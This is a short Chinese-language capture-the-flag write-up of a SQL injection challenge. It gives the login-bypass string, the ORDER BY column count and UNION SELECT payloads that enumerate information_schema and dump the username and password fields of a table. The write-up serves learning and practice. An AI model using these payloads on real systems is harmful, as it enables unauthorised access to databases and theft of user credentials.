先随便试一下万能后台密码,测试一下闭合号
1' or 1 #
1
emmm
登进去了,确定闭合号,接着用order by判断一下字段数
发现当字段数为4的时候报错,所以字段数为3,再用联合查询看一下回显的字段
可以看到2和3的位置有回显,接着看一下当前使用的数据库表名有啥,构造用户名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
再看一下表l0ve1ysq1里的字段有啥,构造用户名
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#
再看看username跟password这两个字段的内容,构造用户名
1' union select 1,group_concat(username),group_concat(password) from l0ve1ysq1#
点击登录
emmm,好乱,缩小一下页面
拿到flag